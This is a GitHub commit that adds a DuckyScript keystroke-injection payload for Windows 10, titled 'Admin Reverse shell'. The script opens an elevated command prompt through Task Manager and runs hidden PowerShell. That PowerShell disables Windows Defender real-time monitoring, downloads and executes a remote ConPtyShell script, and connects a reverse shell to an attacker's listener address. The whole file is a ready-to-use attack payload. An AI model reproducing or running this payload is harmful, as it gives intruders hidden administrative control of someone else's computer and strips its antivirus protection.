Add files via upload

pull/87/head
Naitik Joshi 2022-05-19 10:25:01 +05:30 committed by GitHub
parent 7f2188f8fd
commit be8a63b34c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 0 deletions

View File

@ -0,0 +1,33 @@
REM Title: Admin Reverse shell
REM Author: Naitik Dharmendra Joshi
REM Description: Opens cmd and with admin privileges and starts a reverse shell in hidden Powershell window
REM Target: Windows 10 (CMD, Powershell)
REM Version: 1.0
REM Category: General
REM Change the Following Details.
REM [LISTENER_IP_ADDRESS] IP Address of the Attacker System.
REM [PORT] The Port on the target system you want Netcat to listen on.
DELAY 300
GUI r
DELAY 20
REM --> Opens Task Manager
STRING taskmgr
DELAY 150
ALT f
n
DELAY 50
REM --> Starts CMD
STRING cmd
TAB
REM --> Turn On Admin Privileges
SPACE
REM --> Run
ENTER
DELAY 20
REM --> Kills TaskManager, Executes PowerShell Commands (Hidden), Disables Windows Defender and Executes a Reverse Shell
STRING taskkill /IM taskmgr.exe && powershell -WindowStyle hidden Set-MpPreference -DisableRealtimeMonitoring $true; IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [LISTENER_IP_ADDRESS] [PORT]");